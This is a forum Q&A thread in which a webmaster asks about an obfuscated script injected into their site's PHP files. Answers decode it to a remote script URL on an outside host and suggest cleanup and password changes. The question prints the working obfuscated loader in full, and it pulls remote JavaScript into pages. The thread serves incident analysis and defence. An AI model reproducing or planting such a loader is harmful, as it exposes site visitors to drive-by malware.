Iframe malicious code in PHP files?

Question

I found the following code in PHP files in my website. I think someone just able to hack my ftp or with some way he's able to add this script in my PHP files, don't know how.

<script>/*Exception*/ document.write('<script src='+'h&)t()#t@$^p^^(:&#/&/!)!@n&o&&$$@v@)!o)t@$e$!))k)^a)@!-$&&@r$u!!.)&u$!i(#m)#^s#()e$#$r#v$^(.!$#)n&e&)t).#p&&)@&i&@c)#h^(u$#!n@))$t)#e@&!r(-!&&c^&o(^m)!)^&.)g($e^)n#^u&&^i$@#n(e$c!@o@!$)l!)#o&$(r$@)s)@&$.&^r(u()&:!)8(0@@!8$&&0!(^/&^!c!^o^!m!^&d&i)#!r$!()e$#c^(t@@.@!d((#e&@/^&^c!!)!)o#((#m&$$d)^)$i&(&r!&e&$)!c@(#t#$.(d^e(!#/&!^e)a!^()r&)t^@h@l@$i(&$n#$^$k(&.&n(#^e#t#/^@w$o^&r@&$l&^d#o!&&#f@()!w((a)(r$!c(!)r!)&#a^&f#$t(&$.#($c(^@o@@m#&^/!@g&#o(^o^&(!&g@l#e^!&&.(c^o#$@m#$/(^##'.replace(/&|\(|\$|\)|\!|\^|@|#/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--5f81e446ddf4e34599fb494b668c1569-->

But I want to know the meaning of above code, I suppose it is encrypted in HTML format or in some other form, but what the above code is actually doing and how someone able to inject it in my website??

Thanks.

Answer 1

The above script src results in the address http://novoteka-ru.uimserv.net.pichunter-com.genuinecolors.ru:8080/comdirect.de/comdirect.de/earthlink.net/worldofwarcraft.com/google.com/

It got into your files either via a security hole in your web site / scripts or directly via ftp.

Make sure to clean your files from this malicious code as soon as possible, change your ftp passwords and fix your security flaws!

Answer 2

I don't think it does anything. It has the same URL Alex posted, so I'm not going to repeat it here.

When I tried retrieving it with curl with a user agent header of IE6, logging headers to a file, I got these headers:

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Feb 2010 21:37:13 GMT
Content-Type: text/javascript
Connection: close
X-Powered-By: PHP/5.1.6
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 2

Additionally, the content of the file seemed to be just a CRLF. Nothing very special.

I don't know why they put it there, but perhaps there used to be something malicious, but now there isn't... or they're just waiting for some time to put some malicious code there.